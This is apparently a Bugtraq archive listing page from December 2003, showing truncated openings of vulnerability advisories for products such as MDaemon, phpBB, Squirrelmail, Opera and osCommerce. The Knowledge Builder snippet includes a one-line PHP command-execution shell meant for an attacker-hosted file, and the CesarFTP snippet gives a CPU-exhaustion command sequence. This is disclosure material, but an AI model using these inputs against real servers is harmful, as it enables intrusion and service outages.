What this all boils down to is that when you add a site to the Trusted
Zone you are giving it additional privileges - this is by design and not
a vulnerability. You can read more about IE Security Settings at

http://www.microsoft.com/windows/ie/using/howto/security/settings.asp

from which we can a

[ more ]  [ reply ]

#######################################################################

Luigi Auriemma

Application: Jordan's Windows Telnet server
http://www.jordan.com/WindowsTelnetServer
Versions: 1.0 (but the same version is also identified as 1.2)
Platform:

[ more ]  [ reply ]

Hat-Squad Security Team Advisory

http://www.hat-squad.com

Product: Alt-N Technologies Mdaemon Mail Server

Version: MDaemon 6.85 and Below to 6.52

Vulnerability: Remote buffer overflow in Raw Message Handler

Release Date: 12/29/2003

Vendor Status:

Informed on 29 Dec 2003

Qui

[ more ]  [ reply ]

ppp-design found the following design error in php-ping:

Details
-------
Product: php-ping
Affected Version: (no version information included in the script)
Immune Version: latest version
OS affected: all OS with php
Vendor-URL: http://www.theworldsend.net/
Vendor-Status: informed, new version ava

[ more ]  [ reply ]

BugTraq,

I have found an SQL injection vulnerability in phpBB. Hoever, I don't think this is going to be be a wide spread problem as it will only work if you are the moderator of a group.

How the SQL injection works:

In groupscp, it uses an array set to delete members from certain groups.

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
GENTOO LINUX SECURITY ANNOUNCEMENT 200312-08
- ------------------------------------------------------------------------
--

GLSA: 200312-08
package: dev-util/cvs
su

[ more ]  [ reply ]

Landesk Management Suite IRCRBOOT.DLL buffer overflow
=================================================

PROGRAM: Landesk Management Suite
HOMEPAGE: http://www.landesk.com
VULNERABLE VERSIONS: 8.0 (untested, but highly possible vulnerable)
7.0 and bel

[ more ]  [ reply ]

############ ###################### ####################
################### ######################## #########################
###################### ##### #### #### ##################
#### #### #### ##### ###### ##

[ more ]  [ reply ]

Product: PHP - mod_php

Versions: 4.2.x, 4.3.x / apache 2.0.x

URL: http://www.php.net

Impact: Daemon Hijacking

Bug class: Leaked Descriptor

Vendor notified: Yes

Fix available: No

Date: 12/26/03

Issue:

======

Mod_php under apache 2.0.x leaks a critical fil

[ more ]  [ reply ]

(Moderators: feel free to wrap the long lines if you think it's necessary,
I'm posting it as I received it)

Hello bugtraq,

The VISA scam rides again!

=== Cut ===

From 1863qb (at) yahoo (dot) com [email concealed] Wed Dec 24 00:42:50 2003
Received: from 172.153.31.70 (AC991F46.ipt.aol.com [172.153.31.70])
by xxxx.xxxx.xxx

[ more ]  [ reply ]

Bugtraq Security Systems released an advisory on Dec 24th to the Full
Disclosure email list about a possible Command Injection Issue in the GPG
subsystem of Squirrelmail. Please note that Bugtraq Security Systems Inc
has no affiliation with the well-regarded official Bugtraq list at
securityfocus.c

[ more ]  [ reply ]

Donato Ferrante

Application: PSERV - the small web server
http://sourceforge.net/projects/pserv

Version: 3.0 beta 2

Bug: directory traversal bug

Author: Donato Ferrante
e-mail: fdonato (at) autistici (dot) org [email concealed]
web:

[ more ]  [ reply ]

Friday, December 26, 2003

Technical 'silent delivery and installation of an executable on a
target computer. No client input other than viewing and web site'.
This may be achieved with the Internet Explorer series of so-
called "browsers", all security settings set to HIGH !

[***premium adver

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Bugtraq Security Systems, Incorporated
www.bugtraq.org

Security Advisory

Advisory Name: Command Injection Issue in Squirrelmail
Release Date: 12/24/2003
Application: Squirrelmail
Platform: Linux (IA3

[ more ]  [ reply ]

Hello bugtraq readers,

A vulnerability exists in OpenBB 1.06 that could allow an attacker to manipulate SQL
queries and obtain sensitive information from the database such as the administrator
md5 password hash.
This vulnerability exists because the index.php script of the application does not

[ more ]  [ reply ]

Documented instance of Internet Explorer 5.22 on a Mac transmitting an HTTP Referer header from a link on a secure page (https):

http://www.gadgetopia.com/2003/12/23/OutlookWebAccessPrivacyHole.html

This is clearly covered in the HTTP 1.1 spec (RFC 2616), Section 15.1.3, "Encoding Sensitive

[ more ]  [ reply ]

Remote Code Execution in Knowledge Builder.

"Knowledge Builder" from www.activecampaign.com allows to execute code.

Example:

Create the following file on your webserver:

----index.php----

<?

system($cmd);

?>

-----------------

And then type in the following URL:

http://targeth

[ more ]  [ reply ]

Hello Bugtraq,

As a part of a recent code audit of the Psychoblogger beta1 code, multiple vulnerabilities were found in the standard distributed code base.

These vulnerabilities range from XSS exploits to SQL Injection exploits.

All details in attached advisory or at http://www.fribble.net/adviso

[ more ]  [ reply ]

Indonesia Security Development Team Advisory

QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
=====================================================================

Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users

[ more ]  [ reply ]

It'd be nice if people would actually check the software site first for
fixes ... http://www.phpbb.com/phpBB/viewtopic.php?t=153818 All you need
to know is there.

International Veneer Co., Inc. wrote:

>----- Original Message -----
>From: "f3sy1 f3sy1" <f3sy1 (at) mail (dot) ru [email concealed]>
>To: <bugtraq@securityfocus

[ more ]  [ reply ]

----------------------------------------------------------------------
TITLE : [Opera 7] Arbitrary File Delete Vulnerability
-= How Dare You Delete My Important Files? =-
PRODUCT : Opera 7 for Windows
VERSIONS : 7.22 build 3221 (JP:build 3222)
7.21

[ more ]  [ reply ]

ProjectForum Multiple Vulnerabilities

#####################################

Credit:
Author : Peter Winter-Smith

Software : ProjectForum
Versions : Version 8.4.2.1 and below
Vendor : Equi4 Software
Vendor Url : http://www.projectforum.com/projectforum/

Vulnerability:
Bug Type : Deni

[ more ]  [ reply ]

#######################################################################

Luigi Auriemma

Application: DCAM WebCam server
http://www.hyperionx.com
http://sourceforge.net/projects/dcamserver/
Versions: <= 8.2.5
Platforms: Windows
Bug:

[ more ]  [ reply ]

In-Reply-To: <3FE4CAC1.8010306 (at) freebsd.lublin (dot) pl [email concealed]>

When an l2tp control packet is sent with optional bits set but containing invalid data, l2tp_avp_print() is passed this bad data.

Then, l2tp_avp_print() calls itself and continues an infinite loop of passing bad data to itself.

I had the consist

[ more ]  [ reply ]

Description :

FTP server CesarFTP v0.99g has a security hole in the command CWD. This command allow somebody to rise up the CPU usage with the following command :

USER user

PASS pass

CWD ..................per 10000....

The CPU utilisation will be equal to 100%, the connection will not res

[ more ]  [ reply ]

December 20, 2003

RE: Banking/eCommerce Basic Vulnerability - Undetectable

Due to the well-known documented ability of XSS/CSS capabilities and the proliferation of 3rd-party web-services, can anyone confirm the following:

If an Online Bank utilizes 3rd-party webservices (javascript/.JS)

[ more ]  [ reply ]

Vendor : osCommerce

URL : http://www.oscommerce.com

Version : osCommerce 2.2-MS1 / osCommerce 2.2-MS2

Risk : SQL Injection Vulnerability & XSS in MS1

And Denial Of Service to users in MS1 & MS2

Description:

osCommerce is an online shop e-commerce solution under on goi

[ more ]  [ reply ]